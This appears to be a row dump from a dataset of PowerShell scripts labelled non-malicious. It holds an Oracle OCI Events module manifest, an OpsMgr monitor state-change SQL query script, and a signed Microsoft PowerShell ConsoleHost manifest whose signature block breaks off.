full_path
stringlengths
31
232
filename
stringlengths
4
167
content
stringlengths
0
48.3M
combined_dataset/train/non-malicious/sample_19_92.ps1
sample_19_92.ps1
# # Module manifest for module 'OCI.PSModules.Events' # # Generated by: Oracle Cloud Infrastructure # # @{ # Script module or binary module file associated with this manifest. RootModule = 'assemblies/OCI.PSModules.Events.dll' # Version number of this module. ModuleVersion = '79.0.0' # Supported PSEditions CompatiblePSEditions = 'Core' # ID used to uniquely identify this module GUID = '5e1c10f7-8832-4248-b692-89297c84ea32' # Author of this module Author = 'Oracle Cloud Infrastructure' # Company or vendor of this module CompanyName = 'Oracle Corporation' # Copyright statement for this module Copyright = '(c) Oracle Cloud Infrastructure. All rights reserved.' # Description of the functionality provided by this module Description = 'This modules provides Cmdlets for OCI Events Service' # Minimum version of the PowerShell engine required by this module PowerShellVersion = '6.0' # Name of the PowerShell host required by this module # PowerShellHostName = '' # Minimum version of the PowerShell host required by this module # PowerShellHostVersion = '' # Minimum version of Microsoft .NET Framework required by this module. This prerequisite is valid for the PowerShell Desktop edition only. # DotNetFrameworkVersion = '' # Minimum version of the common language runtime (CLR) required by this module. This prerequisite is valid for the PowerShell Desktop edition only. # ClrVersion = '' # Processor architecture (None, X86, Amd64) required by this module # ProcessorArchitecture = '' # Modules that must be imported into the global environment prior to importing this module RequiredModules = @(@{ModuleName = 'OCI.PSModules.Common'; GUID = 'b3061a0d-375b-4099-ae76-f92fb3cdcdae'; RequiredVersion = '79.0.0'; }) # Assemblies that must be loaded prior to importing this module RequiredAssemblies = 'assemblies/OCI.DotNetSDK.Events.dll' # Script files (.ps1) that are run in the caller's environment prior to importing this module. # ScriptsToProcess = @() # Type files (.ps1xml) to be loaded when importing this module # TypesToProcess = @() # Format files (.ps1xml) to be loaded when importing this module # FormatsToProcess = @() # Modules to import as nested modules of the module specified in RootModule/ModuleToProcess # NestedModules = @() # Functions to export from this module, for best performance, do not use wildcards and do not delete the entry, use an empty array if there are no functions to export. FunctionsToExport = '*' # Cmdlets to export from this module, for best performance, do not use wildcards and do not delete the entry, use an empty array if there are no cmdlets to export. CmdletsToExport = 'Get-OCIEventsRule', 'Get-OCIEventsRulesList', 'Move-OCIEventsRuleCompartment', 'New-OCIEventsRule', 'Remove-OCIEventsRule', 'Update-OCIEventsRule' # Variables to export from this module VariablesToExport = '*' # Aliases to export from this module, for best performance, do not use wildcards and do not delete the entry, use an empty array if there are no aliases to export. AliasesToExport = '*' # DSC resources to export from this module # DscResourcesToExport = @() # List of all modules packaged with this module # ModuleList = @() # List of all files packaged with this module # FileList = @() # Private data to pass to the module specified in RootModule/ModuleToProcess. This may also contain a PSData hashtable with additional module metadata used by PowerShell. PrivateData = @{ PSData = @{ # Tags applied to this module. These help with module discovery in online galleries. Tags = 'PSEdition_Core','Windows','Linux','macOS','Oracle','OCI','Cloud','OracleCloudInfrastructure','Events' # A URL to the license for this module. LicenseUri = 'https://github.com/oracle/oci-powershell-modules/blob/master/LICENSE.txt' # A URL to the main website for this project. ProjectUri = 'https://github.com/oracle/oci-powershell-modules/' # A URL to an icon representing this module. IconUri = 'https://github.com/oracle/oci-powershell-modules/blob/master/icon.png' # ReleaseNotes of this module ReleaseNotes = 'https://github.com/oracle/oci-powershell-modules/blob/master/CHANGELOG.md' # Prerelease string of this module # Prerelease = '' # Flag to indicate whether the module requires explicit user acceptance for install/update/save # RequireLicenseAcceptance = $false # External dependent modules of this module # ExternalModuleDependencies = @() } # End of PSData hashtable } # End of PrivateData hashtable # HelpInfo URI of this module # HelpInfoURI = '' # Default prefix for commands exported from this module. Override the default prefix using Import-Module -Prefix. # DefaultCommandPrefix = '' }
combined_dataset/train/non-malicious/OpsMgr State Changes.ps1
OpsMgr State Changes.ps1
# Description: State Changes for specified OpsMgr Monitor # Date: 09-12-2009 # Author: Stefan Stranger # Explanation: If you want to know the State Changes for a specific Monitor you can run the next PowerShell script # You need to have db permissions to the OperationsManagerdw database to run this Script. # You need to run the script from the OpsMgr Command Shell because it uses the Get-Monitor Cmdlet. param ([string]$monitor = $(read-host "Please enter Monitor Name"), [string]$server = $(read-host "Please enter servername hosting OperationsManagerdw database")) $MonitorDefaultName = "'" + (get-monitor | where {$_.DisplayName -like $monitor}).DisplayName + "'" if ($MonitorDefaultName -eq "''") {Write-host "No Monitor found"} else { $sqlConnString = "Server=$server;DataBase=OperationsManagerdw;Integrated Security=SSPI" $connection = New-Object System.Data.SqlClient.SqlConnection($sqlConnString) $cmd = New-Object System.Data.SqlClient.SqlCommand $sqlAdapter = New-Object System.Data.SqlClient.SqlDataAdapter $connection.Open() | Out-Null $cmd.CommandTimeout = 30 $cmd.Connection = $connection $startsql = @' SELECT COUNT(*) AS StateChanges, vMonitor.MonitorDefaultName, vManagementPack.ManagementPackDefaultName FROM State.vStateRaw INNER JOIN vManagedEntityMonitor ON State.vStateRaw.ManagedEntityMonitorRowId = vManagedEntityMonitor.ManagedEntityMonitorRowId INNER JOIN vMonitor ON vManagedEntityMonitor.MonitorRowId = vMonitor.MonitorRowId INNER JOIN vMonitorManagementPackVersion ON vManagedEntityMonitor.MonitorRowId = vMonitorManagementPackVersion.MonitorRowId INNER JOIN vManagementPack ON vMonitor.ManagementPackRowId = vManagementPack.ManagementPackRowId WHERE (MonitorDefaultName = '@ $endsql = @' ) AND (vMonitorManagementPackVersion.UnitMonitorInd = 1) GROUP BY vMonitor.MonitorDefaultName, vManagementPack.ManagementPackDefaultName ORDER BY StateChanges DESC '@ $totalsqlquery = $startsql + $MonitorDefaultName + $endsql #Write-host $totalsqlquery $cmd.CommandText = $totalsqlquery $sqlAdapter = New-Object System.Data.SqlClient.SqlDataAdapter $sqlAdapter.SelectCommand = $cmd $ds = New-Object System.Data.DataSet $sqlAdapter.Fill($ds) | Out-Null foreach ($table in $ds.Tables) { $table | Format-Table -auto; } $connection.Close() }
combined_dataset/train/non-malicious/sample_36_0.ps1
sample_36_0.ps1
@{ GUID="56D66100-99A0-4FFC-A12D-EEE9A6718AEF" Author="PowerShell" CompanyName="Microsoft Corporation" Copyright="Copyright (c) Microsoft Corporation." ModuleVersion="7.0.0.0" CompatiblePSEditions = @("Core") PowerShellVersion="3.0" FunctionsToExport = @() CmdletsToExport="Start-Transcript", "Stop-Transcript" AliasesToExport = @() NestedModules="Microsoft.PowerShell.ConsoleHost.dll" HelpInfoURI = 'https://aka.ms/powershell73-help' } # SIG # Begin signature block # MIInzgYJKoZIhvcNAQcCoIInvzCCJ7sCAQExDzANBglghkgBZQMEAgEFADB5Bgor # BgEEAYI3AgEEoGswaTA0BgorBgEEAYI3AgEeMCYCAwEAAAQQH8w7YFlLCE63JNLG # KX7zUQIBAAIBAAIBAAIBAAIBADAxMA0GCWCGSAFlAwQCAQUABCAafI9Gy/Jba/h5 # P4E+2b0zPlBjhQyHNjAYnPqkeCyjq6CCDYUwggYDMIID66ADAgECAhMzAAADri01 # UchTj1UdAAAAAAOuMA0GCSqGSIb3DQEBCwUAMH4xCzAJBgNVBAYTAlVTMRMwEQYD # VQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNy # b3NvZnQgQ29ycG9yYXRpb24xKDAmBgNVBAMTH01pY3Jvc29mdCBDb2RlIFNpZ25p # bmcgUENBIDIwMTEwHhcNMjMxMTE2MTkwODU5WhcNMjQxMTE0MTkwODU5WjB0MQsw # CQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9u # ZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMR4wHAYDVQQDExVNaWNy # b3NvZnQgQ29ycG9yYXRpb24wggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIB # AQD0IPymNjfDEKg+YyE6SjDvJwKW1+pieqTjAY0CnOHZ1Nj5irGjNZPMlQ4HfxXG # yAVCZcEWE4x2sZgam872R1s0+TAelOtbqFmoW4suJHAYoTHhkznNVKpscm5fZ899 # QnReZv5WtWwbD8HAFXbPPStW2JKCqPcZ54Y6wbuWV9bKtKPImqbkMcTejTgEAj82 # 6GQc6/Th66Koka8cUIvz59e/IP04DGrh9wkq2jIFvQ8EDegw1B4KyJTIs76+hmpV # M5SwBZjRs3liOQrierkNVo11WuujB3kBf2CbPoP9MlOyyezqkMIbTRj4OHeKlamd # WaSFhwHLJRIQpfc8sLwOSIBBAgMBAAGjggGCMIIBfjAfBgNVHSUEGDAWBgorBgEE # AYI3TAgBBggrBgEFBQcDAzAdBgNVHQ4EFgQUhx/vdKmXhwc4WiWXbsf0I53h8T8w # VAYDVR0RBE0wS6RJMEcxLTArBgNVBAsTJE1pY3Jvc29mdCBJcmVsYW5kIE9wZXJh # dGlvbnMgTGltaXRlZDEWMBQGA1UEBRMNMjMwMDEyKzUwMTgzNjAfBgNVHSMEGDAW # gBRIbmTlUAXTgqoXNzcitW2oynUClTBUBgNVHR8ETTBLMEmgR6BFhkNodHRwOi8v # d3d3Lm1pY3Jvc29mdC5jb20vcGtpb3BzL2NybC9NaWNDb2RTaWdQQ0EyMDExXzIw # MTEtMDctMDguY3JsMGEGCCsGAQUFBwEBBFUwUzBRBggrBgEFBQcwAoZFaHR0cDov # L3d3dy5taWNyb3NvZnQuY29tL3BraW9wcy9jZXJ0cy9NaWNDb2RTaWdQQ0EyMDEx # XzIwMTEtMDctMDguY3J0MAwGA1UdEwEB/wQCMAAwDQYJKoZIhvcNAQELBQADggIB # AGrJYDUS7s8o0yNprGXRXuAnRcHKxSjFmW4wclcUTYsQZkhnbMwthWM6cAYb/h2W # 5GNKtlmj/y/CThe3y/o0EH2h+jwfU/9eJ0fK1ZO/2WD0xi777qU+a7l8KjMPdwjY # 0tk9bYEGEZfYPRHy1AGPQVuZlG4i5ymJDsMrcIcqV8pxzsw/yk/O4y/nlOjHz4oV # APU0br5t9tgD8E08GSDi3I6H57Ftod9w26h0MlQiOr10Xqhr5iPLS7SlQwj8HW37 # ybqsmjQpKhmWul6xiXSNGGm36GarHy4Q1egYlxhlUnk3ZKSr3QtWIo1GGL03hT57 # xzjL25fKiZQX/q+II8nuG5M0Qmjvl6Egltr4hZ3e3FQRzRHfLoNPq3ELpxbWdH8t # Nuj0j/x9Crnfwbki8n57mJKI5JVWRWTSLmbTcDDLkTZlJLg9V1BIJwXGY3i2kR9i # 5HsADL8YlW0gMWVSlKB1eiSlK6LmFi0rVH16dde+j5T/EaQtFz6qngN7d1lvO7uk # 6rtX+MLKG4LDRsQgBTi6sIYiKntMjoYFHMPvI/OMUip5ljtLitVbkFGfagSqmbxK # 7rJMhC8wiTzHanBg1Rrbff1niBbnFbbV4UDmYumjs1FIpFCazk6AADXxoKCo5TsO # zSHqr9gHgGYQC2hMyX9MGLIpowYCURx3L7kUiGbOiMwaMIIHejCCBWKgAwIBAgIK # YQ6Q0gAAAAAAAzANBgkqhkiG9w0BAQsFADCBiDELMAkGA1UEBhMCVVMxEzARBgNV # BAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jv # c29mdCBDb3Jwb3JhdGlvbjEyMDAGA1UEAxMpTWljcm9zb2Z0IFJvb3QgQ2VydGlm # aWNhdGUgQXV0aG9yaXR5IDIwMTEwHhcNMTEwNzA4MjA1OTA5WhcNMjYwNzA4MjEw # OTA5WjB+MQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UE # BxMHUmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSgwJgYD # VQQDEx9NaWNyb3NvZnQgQ29kZSBTaWduaW5nIFBDQSAyMDExMIICIjANBgkqhkiG # 9w0BAQEFAAOCAg8AMIICCgKCAgEAq/D6chAcLq3YbqqCEE00uvK2WCGfQhsqa+la # UKq4BjgaBEm6f8MMHt03a8YS2AvwOMKZBrDIOdUBFDFC04kNeWSHfpRgJGyvnkmc # 6Whe0t+bU7IKLMOv2akrrnoJr9eWWcpgGgXpZnboMlImEi/nqwhQz7NEt13YxC4D # dato88tt8zpcoRb0RrrgOGSsbmQ1eKagYw8t00CT+OPeBw3VXHmlSSnnDb6gE3e+ # lD3v++MrWhAfTVYoonpy4BI6t0le2O3tQ5GD2Xuye4Yb2T6xjF3oiU+EGvKhL1nk # kDstrjNYxbc+/jLTswM9sbKvkjh+0p2ALPVOVpEhNSXDOW5kf1O6nA+tGSOEy/S6 # A4aN91/w0FK/jJSHvMAhdCVfGCi2zCcoOCWYOUo2z3yxkq4cI6epZuxhH2rhKEmd # X4jiJV3TIUs+UsS1Vz8kA/DRelsv1SPjcF0PUUZ3s/gA4bysAoJf28AVs70b1FVL # 5zmhD+kjSbwYuER8ReTBw3J64HLnJN+/RpnF78IcV9uDjexNSTCnq47f7Fufr/zd # sGbiwZeBe+3W7UvnSSmnEyimp31ngOaKYnhfsi+E11ecXL93KCjx7W3DKI8sj0A3 # T8HhhUSJxAlMxdSlQy90lfdu+HggWCwTXWCVmj5PM4TasIgX3p5O9JawvEagbJjS # 4NaIjAsCAwEAAaOCAe0wggHpMBAGCSsGAQQBgjcVAQQDAgEAMB0GA1UdDgQWBBRI # bmTlUAXTgqoXNzcitW2oynUClTAZBgkrBgEEAYI3FAIEDB4KAFMAdQBiAEMAQTAL # BgNVHQ8EBAMCAYYwDwYDVR0TAQH/BAUwAwEB/zAfBgNVHSMEGDAWgBRyLToCMZBD # uRQFTuHqp8cx0SOJNDBaBgNVHR8EUzBRME+gTaBLhklodHRwOi8vY3JsLm1pY3Jv # c29mdC5jb20vcGtpL2NybC9wcm9kdWN0cy9NaWNSb29DZXJBdXQyMDExXzIwMTFf # MDNfMjIuY3JsMF4GCCsGAQUFBwEBBFIwUDBOBggrBgEFBQcwAoZCaHR0cDovL3d3 # dy5taWNyb3NvZnQuY29tL3BraS9jZXJ0cy9NaWNSb29DZXJBdXQyMDExXzIwMTFf # MDNfMjIuY3J0MIGfBgNVHSAEgZcwgZQwgZEGCSsGAQQBgjcuAzCBgzA/BggrBgEF # BQcCARYzaHR0cDovL3d3dy5taWNyb3NvZnQuY29tL3BraW9wcy9kb2NzL3ByaW1h # cnljcHMuaHRtMEAGCCsGAQUFBwICMDQeMiAdAEwAZQBnAGEAbABfAHAAbwBsAGkA # YwB5AF8AcwB0AGEAdABlAG0AZQBuAHQALiAdMA0GCSqGSIb3DQEBCwUAA4ICAQBn # 8oalmOBUeRou09h0ZyKbC5YR4WOSmUKWfdJ5DJDBZV8uLD74w3LRbYP+vj/oCso7 # v0epo/Np22O/IjWll11lhJB9i0ZQVdgMknzSGksc8zxCi1LQsP1r4z4HLimb5j0b # pdS1HXeUOeLpZMlEPXh6I/MTfaaQdION9MsmAkYqwooQu6SpBQyb7Wj6aC6VoCo/ # KmtYSWMfCWluWpiW5IP0wI/zRive/DvQvTXvbiWu5a8n7dDd8w6vmSiXmE0OPQvy # CInWH8MyGOLwxS3OW560STkKxgrCxq2u5bLZ2xWIUUVYODJxJxp/sfQn+N4sOiBp # mLJZiWhub6e3dMNABQamASooPoI/E01mC8CzTfXhj38cbxV9Rad25UAqZaPDXVJi # hsMdYzaXht/a8/jyFqGaJ+HNpZfQ7l1jQeNbB5yHPgZ3BtEGsXUfFL5hYbXw3MYb # BL7fQccOKO7eZS/sl/ahXJbYANahRr1Z85elCUtIEJmAH9AAKcWxm6U/RXceNcbS # oqKfenoi+kiVH6v7RyOA9Z74v2u3S5fi63V4GuzqN5l5GEv/1rMjaHXmr/r8i+sL # gOppO6/8MO0ETI7f33VtY5E90Z1WTk+/gFcioXgRMiF670EKsT/7qMykXcGhiJtX # cVZOSEXAQsmbdlsKgEhr/Xmfwb1tbWrJUnMTDXpQzTGCGZ8wghmbAgEBMIGVMH4x # CzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRt # b25kMR4wHAYDVQQKExVNaWNyb3NvZnQgQ29ycG9yYXRpb24xKDAmBgNVBAMTH01p # Y3Jvc29mdCBDb2RlIFNpZ25pbmcgUENBIDIwMTECEzMAAAOuLTVRyFOPVR0AAAAA # A64wDQYJYIZIAWUDBAIBBQCgga4wGQYJKoZIhvcNAQkDMQwGCisGAQQBgjcCAQQw # HAYKKwYBBAGCNwIBCzEOMAwGCisGAQQBgjcCARUwLwYJKoZIhvcNAQkEMSIEILL0 # LNcTOl5fB4j3BOCsjqQox/Jicg70oB7mLdT2Lf6QMEIGCisGAQQBgjcCAQwxNDAy # oBSAEgBNAGkAYwByAG8AcwBvAGYAdKEagBhodHRwOi8vd3d3Lm1pY3Jvc29mdC5j # b20wDQYJKoZIhvcNAQEBBQAEggEAPkPeEMryFsYLTPXA5YvIVWY5yPKmbmJlJcyo # 8ImlLWrjkmI/JxunhaU2yEC0t1EtGKFjcInmc4m8YeeAG5NEpoXwT5PqLzRbqKme # UX0ztD1TgRnVdEfwRZKJmVidy76eL/O4999odaFxC0kEhtTZMmzmFcrfLlObUfwO # b3wTkN029cM8NhvBwpVSaulS7VsTO/OkXFue01vRCmyQ0Lgh/ARcbVrb2hyAKzUg # WgMh1mz7PTOeCoQdc+4jYtyD1DjFrvJqgfe5zapGV11RHgEAZMITiO8RN9ZES5RU # n4yPsm1AlnCZKvqT+wZIqE12vB8IJrFXSp+da3znltYrujeF8qGCFykwghclBgor # BgEEAYI3AwMBMYIXFTCCFxEGCSqGSIb3DQEHAqCCFwIwghb+AgEDMQ8wDQYJYIZI # AWUDBAIBBQAwggFZBgsqhkiG9w0BCRABBKCCAUgEggFEMIIBQAIBAQYKKwYBBAGE # WQoDATAxMA0GCWCGSAFlAwQCAQUABCD0GuU44THB+ULbW6kh7v32GdNy8n0pacSJ # rQXRuItp3gIGZfyCj38dGBMyMDI0MDQwOTIzMDg1Ny45NjJaMASAAgH0oIHYpIHV # MIHSMQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMH # UmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMS0wKwYDVQQL # EyRNaWNyb3NvZnQgSXJlbGFuZCBPcGVyYXRpb25zIExpbWl0ZWQxJjAkBgNVBAsT # HVRoYWxlcyBUU1MgRVNOOjg2REYtNEJCQy05MzM1MSUwIwYDVQQDExxNaWNyb3Nv # ZnQgVGltZS1TdGFtcCBTZXJ2aWNloIIReDCCBycwggUPoAMCAQICEzMAAAHdXVcd # ldStqhsAAQAAAd0wDQYJKoZIhvcNAQELBQAwfDELMAkGA1UEBhMCVVMxEzARBgNV # BAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jv # c29mdCBDb3Jwb3JhdGlvbjEmMCQGA1UEAxMdTWljcm9zb2Z0IFRpbWUtU3RhbXAg # UENBIDIwMTAwHhcNMjMxMDEyMTkwNzA5WhcNMjUwMTEwMTkwNzA5WjCB0jELMAkG # A1UEBhMCVVMxEzARBgNVBAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQx # HjAcBgNVBAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEtMCsGA1UECxMkTWljcm9z # b2Z0IElyZWxhbmQgT3BlcmF0aW9ucyBMaW1pdGVkMSYwJAYDVQQLEx1UaGFsZXMg # VFNTIEVTTjo4NkRGLTRCQkMtOTMzNTElMCMGA1UEAxMcTWljcm9zb2Z0IFRpbWUt # U3RhbXAgU2VydmljZTCCAiIwDQYJKoZIhvcNAQEBBQADggIPADCCAgoCggIBAKhO # A5RE6i53nHURH4lnfKLp+9JvipuTtctairCxMUSrPSy5CWK2DtriQP+T52HXbN2g # 7AktQ1pQZbTDGFzK6d03vYYNrCPuJK+PRsP2FPVDjBXy5mrLRFzIHHLaiAaobE5v # FJuoxZ0ZWdKMCs8acjhHUmfaY+79/CR7uN+B4+xjJqwvdpU/mp0mAq3earyH+AKm # v6lkrQN8zgrcbCgHwsqvvqT6lEFqYpi7uKn7MAYbSeLe0pMdatV5EW6NVnXMYOTR # KuGPfyfBKdShualLo88kG7qa2mbA5l77+X06JAesMkoyYr4/9CgDFjHUpcHSODuj # lFBKMi168zRdLerdpW0bBX9EDux2zBMMaEK8NyxawCEuAq7++7ktFAbl3hUKtuzY # C1FUZuUl2Bq6U17S4CKsqR3itLT9qNcb2pAJ4jrIDdll5Tgoqef5gpv+YcvBM834 # bXFNwytd3ujDD24P9Dd8xfVJvumjsBQQkK5T/qy3HrQJ8ud1nHSvtFVi5Sa/ubGu # YEpS8gF6GDWN5/KbveFkdsoTVIPo8pkWhjPs0Q7nA5+uBxQB4zljEjKz5WW7BA4w # pmFm24fhBmRjV4Nbp+n78cgAjvDSfTlA6DYBcv2kx1JH2dIhaRnSeOXePT6hMF0I # l598LMu0rw35ViUWcAQkUNUTxRnqGFxz5w+ZusMDAgMBAAGjggFJMIIBRTAdBgNV # HQ4EFgQUbqL1toyPUdpFyyHSDKWj0I4lw/EwHwYDVR0jBBgwFoAUn6cVXQBeYl2D # 9OXSZacbUzUZ6XIwXwYDVR0fBFgwVjBUoFKgUIZOaHR0cDovL3d3dy5taWNyb3Nv # ZnQuY29tL3BraW9wcy9jcmwvTWljcm9zb2Z0JTIwVGltZS1TdGFtcCUyMFBDQSUy # MDIwMTAoMSkuY3JsMGwGCCsGAQUFBwEBBGAwXjBcBggrBgEFBQcwAoZQaHR0cDov # L3d3dy5taWNyb3NvZnQuY29tL3BraW9wcy9jZXJ0cy9NaWNyb3NvZnQlMjBUaW1l # LVN0YW1wJTIwUENBJTIwMjAxMCgxKS5jcnQwDAYDVR0TAQH/BAIwADAWBgNVHSUB # Af8EDDAKBggrBgEFBQcDCDAOBgNVHQ8BAf8EBAMCB4AwDQYJKoZIhvcNAQELBQAD # ggIBAC5U2bINLgXIHWbMcqVuf9jkUT/K8zyLBvu5h8JrqYR2z/eaO2yo1Ooc9Shy # vxbe9GZDu7kkUzxSyJ1IZksZZw6FDq6yZNT3PEjAEnREpRBL8S+mbXg+O4VLS0LS # mb8XIZiLsaqZ0fDEcv3HeA+/y/qKnCQWkXghpaEMwGMQzRkhGwcGdXr1zGpQ7HTx # vfu57xFxZX1MkKnWFENJ6urd+4teUgXj0ngIOx//l3XMK3Ht8T2+zvGJNAF+5/5q # Bk7nr079zICbFXvxtidNN5eoXdW+9rAIkS+UGD19AZdBrtt6dZ+OdAquBiDkYQ5k # VfUMKS31yHQOGgmFxuCOzTpWHalrqpdIllsy8KNsj5U9sONiWAd9PNlyEHHbQZDm # i9/BNlOYyTt0YehLbDovmZUNazk79Od/A917mqCdTqrExwBGUPbMP+/vdYUqaJsp # upBnUtjOf/76DAhVy8e/e6zR98PkplmliO2brL3Q3rD6+ZCVdrGM9Rm6hUDBBkvY # h+YjmGdcQ5HB6WT9Rec8+qDHmbhLhX4Zdaard5/OXeLbgx2f7L4QQQj3KgqjqDOW # InVhNE1gYtTWLHe4882d/k7Lui0K1g8EZrKD7maOrsJLKPKlegceJ9FCqY1sDUKU # hRa0EHUW+ZkKLlohKrS7FwjdrINWkPBgbQznCjdE2m47QjTbMIIHcTCCBVmgAwIB # AgITMwAAABXF52ueAptJmQAAAAAAFTANBgkqhkiG9w0BAQsFADCBiDELMAkGA1UE # BhMCVVMxEzARBgNVBAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAc # BgNVBAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEyMDAGA1UEAxMpTWljcm9zb2Z0 # IFJvb3QgQ2VydGlmaWNhdGUgQXV0aG9yaXR5IDIwMTAwHhcNMjEwOTMwMTgyMjI1 # WhcNMzAwOTMwMTgzMjI1WjB8MQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGlu # Z3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBv # cmF0aW9uMSYwJAYDVQQDEx1NaWNyb3NvZnQgVGltZS1TdGFtcCBQQ0EgMjAxMDCC # AiIwDQYJKoZIhvcNAQEBBQADggIPADCCAgoCggIBAOThpkzntHIhC3miy9ckeb0O # 1YLT/e6cBwfSqWxOdcjKNVf2AX9sSuDivbk+F2Az/1xPx2b3lVNxWuJ+Slr+uDZn # hUYjDLWNE893MsAQGOhgfWpSg0S3po5GawcU88V29YZQ3MFEyHFcUTE3oAo4bo3t # 1w/YJlN8OWECesSq/XJprx2rrPY2vjUmZNqYO7oaezOtgFt+jBAcnVL+tuhiJdxq # D89d9P6OU8/W7IVWTe/dvI2k45GPsjksUZzpcGkNyjYtcI4xyDUoveO0hyTD4MmP # frVUj9z6BVWYbWg7mka97aSueik3rMvrg0XnRm7KMtXAhjBcTyziYrLNueKNiOSW # rAFKu75xqRdbZ2De+JKRHh09/SDPc31BmkZ1zcRfNN0Sidb9pSB9fvzZnkXftnIv # 231fgLrbqn427DZM9ituqBJR6L8FA6PRc6ZNN3SUHDSCD/AQ8rdHGO2n6Jl8P0zb # r17C89XYcz1DTsEzOUyOArxCaC4Q6oRRRuLRvWoYWmEBc8pnol7XKHYC4jMYcten # IPDC+hIK12NvDMk2ZItboKaDIV1fMHSRlJTYuVD5C4lh8zYGNRiER9vcG9H9stQc # xWv2XFJRXRLbJbqvUAV6bMURHXLvjflSxIUXk8A8FdsaN8cIFRg/eKtFtvUeh17a # j54WcmnGrnu3tz5q4i6tAgMBAAGjggHdMIIB2TASBgkrBgEEAYI3FQEEBQIDAQAB # MCMGCSsGAQQBgjcVAgQWBBQqp1L+ZMSavoKRPEY1Kc8Q/y8E7jAdBgNVHQ4EFgQU # n6cVXQBeYl2D9OXSZacbUzUZ6XIwXAYDVR0gBFUwUzBRBgwrBgEEAYI3TIN9AQEw # QTA/BggrBgEFBQcCARYzaHR0cDovL3d3dy5taWNyb3NvZnQuY29tL3BraW9wcy9E # b2NzL1JlcG9zaXRvcnkuaHRtMBMGA1UdJQQMMAoGCCsGAQUFBwMIMBkGCSsGAQQB # gjcUAgQMHgoAUwB1AGIAQwBBMAsGA1UdDwQEAwIBhjAPBgNVHRMBAf8EBTADAQH/ # MB8GA1UdIwQYMBaAFNX2VsuP6KJcYmjRPZSQW9fOmhjEMFYGA1UdHwRPME0wS6BJ # oEeGRWh0dHA6Ly9jcmwubWljcm9zb2Z0LmNvbS9wa2kvY3JsL3Byb2R1Y3RzL01p # Y1Jvb0NlckF1dF8yMDEwLTA2LTIzLmNybDBaBggrBgEFBQcBAQROMEwwSgYIKwYB # BQUHMAKGPmh0dHA6Ly93d3cubWljcm9zb2Z0LmNvbS9wa2kvY2VydHMvTWljUm9v # Q2VyQXV0XzIwMTAtMDYtMjMuY3J0MA0GCSqGSIb3DQEBCwUAA4ICAQCdVX38Kq3h # LB9nATEkW+Geckv8qW/qXBS2Pk5HZHixBpOXPTEztTnXwnE2P9pkbHzQdTltuw8x # 5MKP+2zRoZQYIu7pZmc6U03dmLq2HnjYNi6cqYJWAAOwBb6J6Gngugnue99qb74p # y27YP0h1AdkY3m2CDPVtI1TkeFN1JFe53Z/zjj3G82jfZfakVqr3lbYoVSfQJL1A # oL8ZthISEV09J+BAljis9/kpicO8F7BUhUKz/AyeixmJ5/ALaoHCgRlCGVJ1ijbC # HcNhcy4sa3tuPywJeBTpkbKpW99Jo3QMvOyRgNI95ko+ZjtPu4b6MhrZlvSP9pEB # 9s7GdP32THJvEKt1MMU0sHrYUP4KWN1APMdUbZ1jdEgssU5HLcEUBHG/ZPkkvnNt # yo4JvbMBV0lUZNlz138eW0QBjloZkWsNn6Qo3GcZKCS6OEuabvshVGtqRRFHqfG3 # rsjoiV5PndLQTHa1V1QJsWkBRH58oWFsc/4Ku+xBZj1p/cvBQUl+fpO+y/g75LcV # v7TOPqUxUYS8vwLBgqJ7Fx0ViY1w/ue10CgaiQuPNtq6TPmb/wrpNPgkNWcr4A24 # 5oyZ1uEi6vAnQj0llOZ0dFtq0Z4+7X6gMTN9vMvpe784cETRkPHIqzqKOghif9lw # Y1NNje6CbaUFEMFxBmoQtB1VM1izoXBm8qGCAtQwggI9AgEBMIIBAKGB2KSB1TCB # 0jELMAkGA1UEBhMCVVMxEzARBgNVBAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1Jl # ZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEtMCsGA1UECxMk # TWljcm9zb2Z0IElyZWxhbmQgT3BlcmF0aW9ucyBMaW1pdGVkMSYwJAYDVQQLEx1U # aGFsZXMgVFNTIEVTTjo4NkRGLTRCQkMtOTMzNTElMCMGA1UEAxMcTWljcm9zb2Z0 # IFRpbWUtU3RhbXAgU2VydmljZaIjCgEBMAcGBSsOAwIaAxUANiNHGWXbNaDPxnyi # DbEOciSjFhCggYMwgYCkfjB8MQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGlu # Z3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBv # cmF0aW9uMSYwJAYDVQQDEx1NaWNyb3NvZnQgVGltZS1TdGFtcCBQQ0EgMjAxMDAN # BgkqhkiG9w0BAQUFAAIFAOnAC1owIhgPMjAyNDA0MTAwMjQ1NDZaGA8yMDI0MDQx # MTAyNDU0NlowdDA6BgorBgEEAYRZCgQBMSwwKjAKAgUA6cALWgIBADAHAgEAAgII # uTAHAgEAAgISUzAKAgUA6cFc2gIBADA2BgorBgEEAYRZCgQCMSgwJjAMBgorBgEE # AYRZCgMCoAowCAIBAAIDB6EgoQowCAIBAAIDAYagMA0GCSqGSIb3DQEBBQUAA4GB # 